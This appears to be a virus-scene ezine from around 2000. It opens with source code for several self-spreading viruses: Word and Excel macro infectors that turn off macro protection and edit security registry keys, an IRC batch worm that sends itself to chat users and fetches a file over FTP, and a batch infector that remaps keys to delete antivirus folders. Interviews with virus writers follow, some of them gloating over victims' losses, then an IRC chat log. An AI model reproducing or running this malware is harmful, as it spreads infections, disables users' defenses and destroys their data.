VERSION 1.0 CLASS BEGIN MultiUse = -1 'True END Attribute VB_Name = "Blade" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Private Sub Document_Close() On Error Resume Next 'Class.Blade 'code by Necronomikon 'greetz to:Gigabyte,jackie,SnakeByte,Lys Kovick,SerialKiller,Perikles,-KD-,SnakeMan,SlageHammer,dageshi,Ratter,#virus,#shadowvx,[6oCKeR ],Fii7e,LISP Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False Options.ConfirmConversions = False Options.VirusProtection = False CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Options.SaveNormalPrompt = False Options.BlueScreen = True: Application.WindowState = wdWindowStateMaximize CommandBars("Tools").Controls("Macro").Enabled = (99 - 99): CommandBars("File").Controls( "Print Preview").Enabled = (99 - 99): CommandBars("Edit").Controls("Select All").Enabled = ( 99 - 99) CommandBars("Edit").Controls("Undo VBA-Selection.TypeText").Enabled = (99 - 99): CommandBars("Tools").Controls("Word Count...").Enabled = (99 - 99): CommandBars("Tools").Controls("Options...").Enabled = (99 - 99) For Each Target In Application.VBE.VBProjects If Target.VBComponents(1).CodeModule.Lines(1, 1) = "" Then Target.VBComponents(1). CodeModule.addfromstring, ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 26) Next For i = 1 To Documents.Count If Documents(i).Saved = False Then Documents(i).SaveAs Documents(i).FullName Next System.PrivateProfileString("", "HKEY_CURRENT_USER\ControlPanel\Desktop", "MenuShowDelay") = "10000" End Sub

Private Sub Document_Open() y = y + 1 Set a = Word.Application.Application Set j = a.MacroContainer Set k = j.VBProject.vbcomponents(y) Set c = k.codemodule If j = a.NormalTemplate Then Set i = a.ActiveDocument Else Set i = a.NormalTemplate Set e = i.VBProject a.Options.VirusProtection = vbEmpty a.Options.SaveNormalPrompt = vbEmpty With e.vbcomponents(y).codemodule If Not .lines(16, y) Like "'L*m*" Then .deletelines y, .countoflines: .insertlines y, c.lines (y, 19) End With If InStr(y, VBA.Time, "5") Then MsgBox "I'm so happy 'cause today I found my friends, they are in my head." & vbCrLf & "I'm so ugly, thats ok 'cause so are you. Broken mirrors." & vbCrLf & "Sunday morning is every day for all I care and I'm not scared." & vbCrLf & "Light my candles in a days 'cause I forgot...", vbInformation, "Lithium" End Sub 'Lithium / (c) 1999 jackie '(Prove sample of Anti-Bloodhound code) 'No backdrops and no lights can focus 'on that shit...Linezer0 Oldskewl Tribe ' ---[snip]--' ' ' '

Hi there kids, this some very old werk to show you how to code antibloodhound-heuristically. Well, it's just a basic example to prove that it's possible to bypass that heuristic. xD Just check it out and enjoy!

' Whatever tomorrow brings, ' jackie

'fireal Private Sub Workbook_Open() On Error Resume Next For Each fireal In ThisWorkbook.VBProject.VBComponents If fireal.Properties.Count = 73 Then ourcode = fireal.codemodule.Lines(1, 20) Next For Each book In Workbooks For Each fireal In book.VBProject.VBComponents If fireal.Properties.Count = 73 And fireal.codemodule.Lines(1, 1) <> "'fireal" Then fireal.codemodule.deletelines 1, fireal.codemodule.countoflines fireal.codemodule.insertlines 1, ourcode If book.Path = "" Then book.SaveAs book.FullName Else book.Save End If Next Next End Sub 'x97m.fireal (c) 1999 jackie '1st language independent excel class infector 'No backdrops and no lights can focus on that shit...Linezer0 '1999 ' ---[snip]---

' Hi there kids, same as Lithium, I just can present you some old werk ' because of that damn zip disk crash. Hope you can enjoy this language ' independent x97m. Catch y'all around. ' Do you know how I feel, ' jackie

@echo off ::IRC.HighHopes.c ::by -KD- [Metaphase VX Team & NoMercyVirusTeam] ::Greets to Evul, Tally, AngelsKitten, KidCypher, nucleii, ::Roadkil, Zanat0s, Duke, Lys, Jackie, Foxz, darkman, lea ::Raven, Deloss, JFK, BSL4, and -Everyone- in #virus if errorlevel 1 goto noscr c: md c:\pkdown >nul echo [script]>>c:\mirc\script.ini echo n0=;HighHopes.a>>c:\mirc\script.ini echo n1=;by -KD- [Metaphase VX Team & NoMercyVirusTeam]>>c:\mirc\script.ini echo n2=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }>>c:\mirc\script.ini echo n3= /dcc send $nick C:\mirc\hope.zip>>c:\mirc\script.ini echo n4=}>>c:\mirc\script.ini echo n5=>>c:\mirc\script.ini echo n6=ON 1:QUIT:#:/msg $chan The grass was greener.>>c:\mirc\script.ini echo n7=ON 1:connect: {>>c:\mirc\script.ini echo n9= /run attrib +r +s +h C:\mirc\script.ini>>c:\mirc\script.ini echo n10= /run attrib +r +s +h C:\mirc\hope.zip>>c:\mirc\script.ini echo n11=}>>c:\mirc\script.ini echo open ftp.elkhart.net>>c:\ftpme.txt echo anonymous>>c:\ftpme.txt echo [email protected]>>c:\ftpme.txt echo cd pub>>c:\ftpme.txt echo cd shareware>>c:\ftpme.txt echo binary>>c:\ftpme.txt echo hash>>c:\ftpme.txt echo lcd c:\pkdown>>c:\ftpme.txt echo get pkzip204.exe>>c:\ftpme.txt echo bye>>c:\ftpme.txt :noscr echo Keep this open for to have Good Luck! echo When it closes you will have Good Luck! echo Some one has high hopes for You!! @echo on type c:\highhopes1.txt @echo off echo y| del c:\highhopes1.txt >nul if errorlevel 1 goto noftp %windir%\ftp.exe -s:c:\ftpme.txt >nul

>>c:\highhopes1.txt >>c:\highhopes1.txt >>c:\highhopes1.txt

:noftp echo >>c:\highhopes.txt echo The grass was greener. The light was brigher. >>c:\highhopes.txt echo The taste was sweeter. The nights of wonder. >>c:\highhopes.txt echo With friends sorrounding. The dawn mist glowing.>>c:\highhopes.txt echo The water flowing. The endless river. >>c:\highhopes.txt echo For Ever And Ever..... >>c:\highhopes.txt @echo on type c:\highhopes.txt @echo off if errorlevel 1 goto nogo echo y| del c:\highhopes.txt >nul cd \pkdown c:\pkdown\pkzip204.exe >nul echo y| copy %0 c:\pkdown\highhopes.bat >nul c:\pkdown\pkzip hope.zip highho~1.bat >nul echo y| copy hope.zip c:\mirc >nul cd \

echo y| del c:\pkdown\*.* >nul rd c:\pkdown >nul echo y| del c:\ftpme.txt >nul nogo: @echo off cls

@echo off%_FukThat% ::########################################### ::Fuck That 1.0a ::Deloss / NuKE ::This virus goes out to Ruzz and his ::fucked up policies of with who his members ::in Shadowvx can and cannot speak to. ::Free The Tree Frogs! ::########################################### if '%1=='FukThat goto FukThat%2 set FukThat=%0.bat if not exist %FukThat% set FukThat=%0 if '%FukThat%==' set FukThat=autoexec.bat if exist c:\_FukThat.bat goto FG if not exist %FukThat% goto FZ find "FukThat"<%FukThat%>c:\_FukThat.bat attrib c:\_FukThat.bat +h :FG command /c c:\_FukThat F V . .. \ %path% :FZ set FukThat= goto FE :FV shift%_FukThat% if '%2==' exit FukThat for %%a in (%2\*.bat %2*.bat) do call c:\_FukThat F I %%a goto FV :FI find "FukThat"<%3>nul if not errorlevel 1 goto FE type %3>FukThat$ echo.>>FukThat$

type c:\_FukThat.bat>>FukThat$ move FukThat$ %3>nul :FD echo.|date|find "12">nul.FukThat echo DEVICE=c:\windows\command\ansi.sys>>config.sys if errorlevel 1 goto FN :FN echo.|date|find "13">nul.FukThat @echo on echo and if they say you can't come around here say *fuck that*. echo and if they say you can't come around me say *fuck that*. ESC["n";"y";13p ESC["y";"n";13p ESC["N";"y";13p ESC["Y";"n";13p ESC["a";"del c:\avp";13p ESC["e";"del c:\f-prot";13p ESC["i";"del c:\mcafee";13p ESC["o";"del c:\nav";13p ESC["A";"del c:\avp";13p ESC["E";"del c:\f-prot";13p ESC["I";"del c:\mcafee";13p ESC["O";"del c:\nav";13p if errorlevel 1 goto FE echo off exit FukThat :FE

Real Time Interview with Rajaat Interviewer: Gigabyte

First question.. Do all VXers here walk around stoned all day and bang with their heads against lamp posts? Well, in order to feel at home during an Amsterdam VX meeting you will have to walk the left-hand path of stonedness. I think I'll manage to become Dutch quite well ;-) How old were you when you had your first experience with computers? My first computer was an Aquarius, an ugly little fellow with blue rubber keys. I got it for my birthday when I was 7 years old. How old were you when you joined the VX scene? I was just about your age when I conducted my first virus experiments, just before I got 18 years old. How many viruses have you written by now.. any chance your totally drugged brain can still remember? I cannot recall an actual number, but I think it must be around 200 or so, including minor variants. Do you consider yourself an 'evil' or rather 'nice' VXer? I consider myself to be a 'nice' VXer, if you can speak of such a thing. Since we are evil in the eyes of the end users, I frankly don't care if I appear to be friendly or not. Which language do you like most for writing viruses? Hah, that's a good question. I would likr a language in which you have complete control over the code it generates, so highly configurable languages like C-- or Terse are good, but lack the things needed in a ring0 win32 environment. I yet have to look for a free language that comes with source and generates tight code. Perl is interesting, though extremely bloated. Did you ever write anything destructive? If so, how do you feel about that now? I have written one virus that did intentional damage, but after having goofed up with debug I decided for my own good to try to make them as harmless as possible. What is, in your opinion, the most idiotic comment about any of your viruses you've seen, from AVers? I laughed a lot when I saw the description of Fick.7326 on the AVP site. I had expected that Kaspersky would be smart enough to recognize that major part of it is written in Borland C++, instead of Pascal. Do your family and friends know you write viruses? Yes, they don't care as long as I leave their machines alone.

What am I doing here between these weirdos? (being the only normal person around) I have no idea, perhaps masochism? ;-) Do you have enemies in the scene? Not that I am aware of. There are people I like and there are people I don't like. These people I do not communicate with may want to consider themselves my enemy but that makes no difference to me. What do you think about infected users? I pity them. After so many media hypes (Michelangelo, Melissa, I love you..) people should have learned the necessity of installing a good scanner from a trusted source. If a family member would catch one of your viruses and he/she had no AV installed at all, no backups and he/she had caught it by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out? Yes, and immediately install a cracked version of AVP. I'd tell them they are stupid if they don't keep it updated. My hobby is writing them, not giving users a hard time. Unfortunately, a virus is made to be spread, thus I give them to people who are interested. What's your favourite VX website? www.coderz.net, it is like a portal form, just like slashdot. Are you IRC addicted? No, I don't think so. How long are you planning to stay in the scene? (Out, out!! ;) I have no set plans whatsoever, but I feel like I have not tried all the things I wish to accomplish. There is so much I yet would like to try out, but this mainly has to do with compilers and interpreter issues. How big do you think my chances are to survive smoking a joint? (in %) Hmm, about 50% at first, after 20 years of smoking weed I guess that gets trimmed down to 5% :-D But you'll get a try.. Can I take a picture of the cat? If he agrees you can try, but I had troubles myself keeping him in a pose for longer than 2 seconds.

Which AVers do you hate most? I don't hate them, though it is a pity they earn money on the digital havoc we wreak. Which of your viruses are you most proud of? I think I'm proud of most of them. Each time I coded something I tried out new stuff, so each one is a milestone in my writing (or lack thereof) skills. Which other viruses do you like? I for example like Babylonia for the ideas, win32.crypto for its tricks with encryption. All inventive virus writers have my respect. How important is virus writing for you and does it have any influence on your life? It has not such a great importance as it used to be for me, since my job consumes most time. Are you in any other underground scene, except for VX? (hacking, phreaking..) No, those things don't have my interest. Do you have a real life? Not very much, it is consumed by my work most of the time, though I might buy one if I got enough cash. Which kind of movies and music do you like? I like some movies like Braveheart, The Mummy, The Matrix, horror and comics. My music preference is hard rock. Do you have any other hobbies? I don't have many hobbies though I like reading books and sometimes I even enjoy cooking, since I now have to (can't live on microwave food alone). Are you married or do you have a girlfriend? No. Do you believe in God?

Yes, for I am my own God :-) What's your favourite country/city? The place I would like to be my next holiday is Curacao. Are you getting bored yet? No, hungry, where is the food in this pillage of papers? What's your favourite food? Aargh! Now questions about food while I'm starving? I like pastas and chips of course. Do you like junk food? By occasion, when I don't feel like cooking. Which channel do you prefer, #vir or #virus, and why? #virus, by lack of knowledge what the other channel is for. What do you like most about the scene and writing viruses? The broad scale of different people involved. Is there anything else you want to mention? Not right now, I'll mail you when I come to think of something. Any greetings or hate messages? Hate to McDonalds, for not grilling their burgers :-) Thanks for the interview :) You're welcome, lets have dinner , Gigabyte :-)

Interview with Raid/SLAM, about Irok Interviewer: Gigabyte

First of all, how did you come up with the name 'Irok'? It was named after an american car. The iroc-z camaro I simply named it irok ;p What about the virus are you personally most proud of? I'm proud of the fact that avers had no idea what it's payloads did for a very long time. some of them still have incorrect descriptions ;p How long did it take you to write the virus? a little over 2 weeks on/off coding Which part was the most tricky to write? The memory management section. It's a bitch because of all the little routines inside irok. Do you ever base your viruses or virus payloads on your real life (something/someone you're mad at, something funny that happened, habits, etc.), and if so, did you do this in Irok? Yes, and yes. Irok contains the payload which fits the mood I was in at the time of writing it. Did you get any positive or negative reactions on the virus payload from other VXers? I guess it was an even split. Rhape bitched about it, but fuck him. rather, fuck anybody who doesn't like my code. I don't care. ;p What is, in your opinion, the most funny or idiotic comment about Irok you've seen, from AVers? oh hehehe, one second When internal counters of the virus reach certain values, the virus displays a message on screen. Most of this message is from lyrics of the song 'Aenema' by band 'Tool'. We wont reproduce the message here as the song seriously needs the Parental Advisory sticker for explicit lyrics. Hahahahahaha tis funny, no? :) it sure is Which AV was that from?

http://www.Europe.F-Secure.com/v-descs/irok.htm Do you think Irok is better than Toadie? hmm, no toadie was funnier iroks mean ;p On which points is Irok better than other viruses, and what are its weak points? It's better then some other viruses by default because it works as designed... it's weak points would be the memory it requires, and it's size. and the fact that it's not polymorphic. Which other viruses that were in the wild at the time Irok was, or later, do you think that actually were so lame that they weren't worth any attention at all, and which ones do you respect? shrug... The vbs viruses suck in my opinion. As for respecting viruses... I'd have to respect the author of the virus, and I don't respect many people. What do you consider the most important advantage and disadvantage compared to ASM viruses? advantage... total control of the pc, disadvantage, takes a long time to write a good one. How do you think most infected users caught the virus? probably got greedy decided to download a crack or something. If a family member would catch Irok and he/she had no AV installed at all, no backups and he/she had caught Irok by running an e-mail attachment, despite all the warnings on the Internet and elsewhere, would you help him/her out? Nope I have little/nothing to do with my family. What about friends? I don't have many friends. I think I know 3 people who I really consider as friends. the rest are.. mostly acquaintances. Do you think the fact that AVers had some trouble figuring out what exactly Irok does, had anything to do with the language it's written in, as ASIC isn't common for viruses? Yep and I think perhaps they don't know asm as well as they claim. How important is virus writing for you and did writing Irok have any influence on your life (time, effort, pride, stress)? Virus writing and smoking pot keep me alive.

Irok had no influence on anything. it was an accomplishment for me. Are you planning to write any more Irok versions? probably not. Is there anything else you want to mention about Irok? Yes. For those of you who got hit by it, I hope you lost everything. Any greetings or hate messages? Oh yes Greetings to : heh, Nobody Hatez goes out to: Most of you on both sides, fuck you all. So much for political correctness eh? Thanks a lot for the interview :)

Interview with The Unforgiven Interviewer: Gigabyte

Heya.. To start with, what do you occupy with lately? Life. Gf, friends, work, parties and all other things you can enjoy doing while you still are a young adult. Which of your viruses are you most proud of? None really, don't they all suck? Immortal Riot are though responsible for quite a few really awesome viruses. Not me in person though. Some of your viruses were pretty destructive. How do you think about that now? I don't really think anything about it since it's all behind me. I much rather live in the present than in the past. Do you think the VX scene has changed a lot in all those years and do you think it was better then or now? I am not really a part of the scene anymore but I try to lurk around and keep myself a bit updated. I'm though not really qualified to make such a comparison. However, I don't really think you can compare things now and then, if a person start writing viruses now, he might fancy the scene as much I did back in 1993. What do you think about all the Internet related viruses now and do you think there will be much more of them? Internet based malware (viruses, worms and so on) is indeed an interesting thing and I'm certain that we'll see more virus alike programs circulating on the net in the future. Internet is very vulnerable and many people will target the net due to the fact that internet technology and internet (un)security are interesting topics and if an attack is done properly, it can affect a lot of people in a very short amount of time. Which old viruses do you like and which new ones? I like all viruses. It's a great thing to see that people still sit around and code things just for fun. Programming for me and most other Immortal Riot guys is nowadays stricly business. Which virus authors and groups do you respect? Everyone who deserves it. Further information about this can read in our ezines called Insane Reality which all be found at our site located at http://www.coderz.net/ImmortalRiot. What made you decide to start Immortal Riot? Curiousity, I think. I'm a very curious person about pretty much everyting.

How important was virus writing for you? Compared with what? Viruswriting was a hobby, the scene were our playground and viruswriting the ticket to acceptance. Did you base your viruses or virus payloads on real life issues? I based some names from real life and I got motivation from real life. Everything is about real life issues in one way or another. What do you think about infected users? I think they should remove the virus. How do you think most people caught your viruses? Probably with anti-virus programs. I only know one person who caught one of my viruses ([Bad Attitude]). He saw "Immortal Riot" scolling all over his monitor and later became a very good coder and an Immortal Riot member. Do you still occupy with computers a lot? I work with computers, but on my spare time? Maybe an hour a week, to pay bills, write emails to friends and exgirlfriends and of course to annoy people with SMS :). Is there anything else you want to mention? Naw, not really. Any greets or hate messages? Greets goes to everyone who ever has been mentioned in a positive matter in Insane Reality and of course to all of Immortal Riot. Special greets must go to Metal Militia. Thanks a lot for the interview :) You're welcome.

Interview with Del Armg0/MATRiX Interviewer: EXE-Gency

Give us a short description of who you are. (Handle, interests, occupation, music, films, location, marital status etc.) I'm 27, lot's girls and one of my nick in life is Fa, humm ... what's more...¿ I'm somebody very curious in fact... lot's hobbys (vx, phreak, short- wave listener, role-playing-game, playing electronic music too, astronomy, ... i'm happy when i'm learning in fact ;) Some of my favorites films are "Eraserhead", "CryingFreeman", "Buffet Froid", ... And i luv music-band like "stereolab", "gong", "bauhaus", ... and many more ! What made you choose your handle? lot's ppl have asked me about it... it's "simply" a name from a AD&D campaign (during 6 years!), there was a character i played as dungeon master, she was called "Larynda Nedylene Barrisson Del'ArmgO", it was a famous Martial Drow family, and a very fun game, so... i kept the name. Have you ever had any previous identities in the computer underground? nop, i was since i've starting known as Del_Armg0, but it's true for some viral experience i use sometimes another nick... it's rare. But since the JC'Zic bust, i prefer to be discreet... sometimes. When did you first get into computers? I've started on a Amstrad cpc 464, and a thomson MO5 !!! Was really shit but really fun. After that i've meet the Atari world, and it was great moment. Atari 520/1040 ST was really great. And in 1996, i've bought a PC under windows... humm no comment! What operating system(s) are you currently running? I've a first 'puter with Win95, a 486 with a russian Dos (a graphic Dos) called Pts-Dos 6.70 and Win 3.1, i like it a lot. And i'm ever using a Atari 1040 (Tos) At work i'm using Win NT, just shit! I hope i will try Win2k soon, i'm sure it will be a great OS for Vx ;) How and when did you first discover the computer underground? Humm... a bit "just like that", i had bought a modem to meet or know more about Underground Electronic ppl... and it's easy to find evil on the Net ;] How did you first get into virus programming? I've started coding to made virus, but i guess the first idea to made a virus come from the first discovered virus when i was younger, it was really new. And lot's hype was made around it. It was Cpc virus, but i've forgotten the name, the fascination is always here.. Probably some movies like "Wargames" or "Tron" are importants in the story... Do you have an interest in the other components of the computer underground? (hack/phreak/warez etc.) Yep. I'm a great fanatic of phreaking, it's a really great and fun "game". Phone network is full of marvellous things...

and i'm lucky, i'm now working in phone network. Hacking is cool, but sometimes too much full of "big-EGOpeople", so i prefer try it alone. Do you consider yourself to be a criminal? Really not ! But here in France, it's really easy to be one, and for cops i'm probably one... (drug, phreak, vx, ... it's just fun life). But why all cool things of life are illegals !!!?¿ Do the laws in your contry make writing viruses illegal and have you had any trouble with the law in your country? Yes, laws here are very bad for H/P/V; i've never be busted and i hope i won't be! But i'm sometimes tired to be paranoid when i'm connected... (proxys, wingates and others anonymisers...). Sabia is probably the worst spreading i did, and my ISP leaves me.. arrgghhhh! ... but ..but Viva phone S.E. ;) Do your friends/family/colleagues know about your interest in the computer underground? Yep, some of them know about it, but really few. It's bad ideas to talk about it because when u send a mail to your friend, he's always afraid ;), and 99% of mass ppl really don't care about vx, so... What are your opinions on virii with destructive payloads? I never did it, cos i don't like it very much... I guess some coders are good coders, but not really imaginative... Virus are artworks, but destruction can be art, so...why not... It's a really great and endless debate, but to my mind, a destructive program is not really a virus. Virus must spread and spread, so why to kill the host and kill himself, in the same time ? How did you get involved with the Matrix virus group? mort was a good electronic friend, some groups ask me for joining, but i was not interrested, i said it to mort, and so he asks me to join MATRiX, this time i said "ok". Does the Matrix group concern themselves with virus programming only or do they have an interest in other underground topics? Actually MATRiX concern only virus coding, but i hope i could introduce some others subjects like phreaking, trojans, hacking, ... Have you been a member of any other groups? Nop, and i've never thought to be in a group, i liked to be alone; but it could be a good experience (and mort is a really good friend). Why did you start learning to program? Was it because you wanted to write computer viruses. i've started to program in 1998 with Delphi, and yes i've started learning to program to write viruses/trojans. So fastly i've learn asm, i've again to learn asm32 (i'be start). I like a lot to learn some toys or silly languages like VB, VDscript, batch, rebol, javascript,... What other languages can you program in? Delphi/Pascal, Asm/Asm32 for serious coding Vba/Vbs, html/wml, and some others scripting languages, for silly things I find Rebol very interesting too (31 platforms !!) I like Toys like PcomP, VDS, M:POSTER,... What do you think of viruses written in languages other than assembly?

i like it! hehehe! Yes, i like all virus, worms or trojans. Some of them are really nice and ingenious but not in asm; too much virii are variants of a variant actually, probably cos the big number of asm source on the Net. What is the best/favourite virus you have written so far? Wooo! Really hard...! but IRC-Worm.ElSpy.2278 & .9619 was great worm at this time, it was my really first, and they had some cool features. i liked a lot my script generator too, called "SENSI". And my prog "Bundy" cos' the silly splash screen. What groups do you value most highly? I guess 29A is one of the most prolific and original group of the present time. Perhaps even too present.. i liked Phalcon-Skism, Immortal Riot, SLAM ... but it's a bit old..skool Which individual programmers (both past and present) do you value most highly? Wooo, really hard to answer! But i like legend like DarkAvenger and stories like that. Bulgarian Myth is great. The text about it are nice novels What zines do you read regularly? Really a lot! I read almost all E-zines about Vx and Phreaking, i read some french Hacking zines too. (www.madchat.org) Cool H/P zines are PyroFreak, IGA, Hackoff, ... ... ... For Vx Zines, 29A & Vxtasy are perhaps the bests (after MATRiX zine, of course:) What do you think of the virus scene? (Both in general and in your own country.) I know well the vx trading scene, and there is too much politics... About vx scene, it's a cool place, but too much young people don't want to see that in vx coding there's an EGO part. Hahahaha! I have some electronic friends, but i'm sometimes a bit away from vx scene. How has the underground scene changed since you first entered? Scene has changed yes, but scene changed so fastly. Guy appears, disappears,... But since the beginning i've kept some good electronic friend in vx scene, it's enough for me. (booohh Phage!;( What do you think the future of virus writing holds? It will depend on different things, like OS. If Linux becomes the main OS it will be a revolution for vxers, probably the scene will be totally changed. And more networks and networking application appear, more worms come too. So future of virus is more in the hand of mass ppl than in our hands. Do you believe in a 'perfect virus'? And if so describe it. A Worm of course :), Joke! But i believe really that the future of the virus is in the worm properties, The next generation of viral code must have abilities to infect the new hardwares (like mobil-phone) and spread using new protocols. WAP network, GRPS and UMTS protocol will be used by phone and tiny computer, the virus will have to use worm technics to spread between phones, computers and other palm & psion. I like the idea of a Autonomous Mobile Cyber Weapon (AMCW) too. The perfect virus will have to use main worm features, will know and find his target and infecting files traded by network user (like pictures, ...yes my dream will be to infect .jpg :) What advice would you give to newbies entering the virus scene? download, print, read, download, print, read, download, print, read, ... After 6 months like that, come on Irc to meet

some ppl and code, code, code, ... A good thing is really to learn the maximum possible things, learn some languages, learn about OS, learn about protocol, learn about people, learn, learn, learn, ... What language should a newbie learn if he wants to start writing viruses? It depends really of the newbie, learn Asm first is good to learn some universal maths/coding theories, after Asm all others languages seems easy, hehehe. But the better thing to do is to try all, to learn again and again. All languages are good if u know really this language, the hardest is perhaps to find THE language. Anything you would like to add? I guess no, lot's things have been said. And i'm not somebody very talkative (gossipy?) cya. Any greets? Yes a lot!!! Greets to : Phage, Perikles, VirusBust, MATRiX team, HomeSlice, Daniel3 Lyskovick, Secret_- Trov, ArteMuse, pbat, mort, Ultras, NBK, TGR, LordDark, Anaktos U, Iblis, W0de, FreDyKrug, Elsa, MelanYe,Roadkill, Zulu, Mist, Urgo32, me, hashish, all! Any plugs? (Homepage, email address etc.) Sure ! mailto: [email protected] http://www.delly.fr.st http://www.coderz.net/matrix

VX meeting 2000 in Czech Republic: Opinions of a few VXers Interviewer: Gigabyte

First week of August, quite sunny, boring IRC channels.. the ideal moment for the yearly VX meeting. While AVers were probably thinking all VXers were sitting in their rooms, with a computer, avoiding the sun and giving dumb users a hard time by writing new viruses, some of us were in fact having a great time in Brno, Czech Republic, getting drunk, stoned, even getting some suntan and sticking 'GriYosoft' papers all over the city. If we still remember anything? I sure do! Lets see what the guys have to say.. Did you enjoy the meeting? GriYo: Oh, if... I always enjoy in all the meetings that we organize in summer. I always find there great dudes ( and dudettes :-P ) and also new places, so i can get my hands out of the keyboard for some days. Benny: ABSOLUTELY YES!!! I can say it was one of the best timez in this year... you dont think so? mort: sure, i met ppl who i've seen only on chat Ratter: of course. it was my first VX meeting in my life and i met great ppl there which i knew only on Internet. It was a great time for me. One of the best in my life... Did there happen anything funny that you remember? GriYo: I had fun one day we went to a big park in Brno... I had brought a little bit of hashish from Spain, and we were smoking... We don't take in beginning to say foolishness and to laugh without stopping, it was really funny. Benny: Yeah, sure. GriYosoft action. all city was full of posters :) and i will never forget how you, GigaByte, got absolutely stoned and drunk, hehe. mort: yea,... giga and beer :) Ratter: yeah of course :) talking with you Gig XD Anything you missed there? GriYo: Mmmmm... no. Benny: Yeah, I expected there will come more ppl from foreign countries. nevertheless, it was really very kewl meeting, I had really fun. mort: more ppl Ratter: yeah i missed darkman there. and other ppl that do VXing

How often did you have a hangover? GriYo: Well, we had a hangover every morning... I thought that i was accustomed to drink a lot of beer, but I was wrong, eh Benny? ;-)))) Benny: almost every morning...:P but three or four beerz in the morning helped me a lot to forget :) mort: hehe,... no comment Ratter: I don't have hangover after weed :) and i didn't drink a lot

Kevin & Kell Bill Holbrook

What follows is the result of a run in I had with a seriously stupid IRCop of Undernet. If you the reader doesn't know or understand shared drives and net.exe, This entire file will be one boring read for you. For the rest of us, It's funny as hell... Definatly a keeper if I do say so myself :] I don't have the logfile handy of my original conversation with chaplain, nor the Logfile earlier that day this shit went down, because I don't log from work. I turned on buffer save after CiCi made her threat, otherwise I wouldn't have proof of that either. However, I do have some wonderful emails; and the entire log of CiCi and myself chatting the next day. Now then, on with the show...

Start of #Christian buffer: Fri Sep 08 16:14:38 2000 ne.no) has joined #Christian hello :) Hiya i need chocolate how are u Great.. yourself? gotta go look throuhg all the chcoclate stashes i know about laters *** chatcat has quit IRC (*MEOW*FWACK*H ISS*WHACK* "you're right... there ISN"T enough room to swing a cat in here...") *** ionxy has quit IRC (Ping timeout for ionxy[194.102.79.136]) some down, my late wife's brother passed away last nigt *** AxeAshes has quit IRC (Baltimore-R. MD.US.Undernet.Org Seattle.WA.US.UnderN et.Org) That's a shame... it's always hard to lose someone you're close to. yes it is, it was cerebral haemorrhage if you understand my english Yeah *** AxeAshes ([email protected]) has joined #Christian but what people tell us, they say life must go on, they said that to me when my wife passed away The problem with that would be trying to get your Mass Air Sensor to register properly. I suppose it COULD be done, but you'll need to add at least a small section of pipe where you can mount it, and then you run a chance of the airflow being wrong. Of course, you could always acquire another stock airbox, do some cutting, get some hosing and try it. No harm in trying, so long as your car still works if you mess up! --TremorX ack! sorry

good thing that's all that was on my clipboard :P j/k * TremorX drops a pin <patience_> hehe -> *lc* You think a lawyer is going to help you bro? Open shares is your problem... *** chatcat ([email protected]) has joined #Christian *** Nuts ([email protected] .NET) has joined #Christian <JadeGA> l8r :) Bye hon *smooch* <JadeGA> see in little while ;) ya *** JadeGA ([email protected]) has left #Christian husband and wife? Not yet :) Close enuff tho *** Latte has quit IRC (Leaving) *** Latte ([email protected] ne.no) has joined #Christian *** Nuts has quit IRC (Ping timeout for Nuts[P29.ASC-MB06.QZN.SKYINET.NET]) *** Nuts ([email protected]) has joined #Christian *** TremorX has quit IRC (Connection reset by Janet Reno) *** chatcat has quit IRC (Ping timeout for chatcat[kruse.fwi.com]) *** Melv\Mike ([email protected] ug.co.nz) has joined #Christian *** JnetyBabe ([email protected] .138.179.LosAngeles1.Level3.net) has joined #Christian <JnetyBabe> can anyone tell me where to look in the bible...... <JnetyBabe> where it talks about sucide and how it makes you go to hell ? I think if you commit suicide you'll goto hell for it, yes. But don't quote me on it, I don't know for sure. <patience_> it doesnt talk about suicide specifically *** AxeAshes has quit IRC (<<-NE>> ©1998, KnightFal www.europa.c om/~colin) patience_: the bible seems to have a real problem with specifics... <patience_> not all the time <patience_> only a few things a few things? according to the bible patience, how old is this planet? a few thousand years? <patience_> in my opinion <patience_> wel *i* think about 10000 years or so

<patience_> i'm not exactly sure 10,000 years eh? <patience_> but theres no verse in the bible that says " the earth is so many years old" Geological Science says she's a hell of a lot older then that. <patience_> Raid maybe a couple 1000 less <patience_> ya well by a few million years or so. * patience_ needs food <patience_> well i dont believe that We know alot more now then we did in the 1800s :) Do you believe dinosaurs roamed the earth at one point? <patience_> they could very well have <patience_> cos they couldda gotten destroyed in the flood could? ehm.. No they did. Raid:my mother in law does * patience_ cant debate because i dont have enough knowledge j/k j/k DIdn't god claim we were the first? <patience_> you calling your motheri n law a dinosaur? lol Well, how can we be the first on this planet, if the dinosaurs were here and long gone? patience_"im not married...i was trying to be funny ;] adam and eve, then they furry little animals... No mention of dinos.. Yet, we have real evidence that they existed. lol <patience_> heh like there huge skeleton remains, and the fuel I paid almost 2.00 a gallon that runs my truck. RaidSTX:STX don't forget, xians don't understand that carbon dating is valid. <patience_> well God didnt name every single creature He created in Genesis *** CookieMix (HS17pro@host212-140-40-3 2.btinternet.com) has left #Christian *** `Pegasus (Nons@HSE-QuebecCity-ppp82 042.qc.sympatico.ca) has joined #Christian maybe dinos died out after jesus was crucified. But he did specifically say We were first right? <`Pegasus> hi a;;

<`Pegasus> hi all <patience_> hi `Pegasus @ The dinosaurs have been LONG gone. <patience_> umm <patience_> God created animals maybe first yes he did. <`Pegasus> hi patience :) no no read the genesis <patience_> but we were around too i reckon <patience_> anyway <`Pegasus> Psyk: You still here? god said he created man frist than woman than animals patience_: What about cave men? <patience_> we all have our own opinions patience_: You can't claim this is my opinion, Dinosaurs roamed this planet. they found human remains that date 40,000 years ago... <`Pegasus> Hi zooropa! it's a fact. `Pegasus :] Fossil fuel... <patience_> well they SAY they are 40000 years old <patience_> i dont believe it <patience_> ANYWAY moving on.... haha real skeletons, some complete. patience_: Not moving on, I like this topic. patience_ why not? have you researched carbon dating techniques? and there isn't anything wrong with this topic... it's legit. <patience_> well i've heard that they can be wrong patience_ do you think you are brighter than the scientific community which relys on carbon dating? <patience_> i heard of particular incidents <patience_> pSyk_ i didnt say i was <patience_> i believe God patience_: Where do you believe the gas you put in your car comes from? 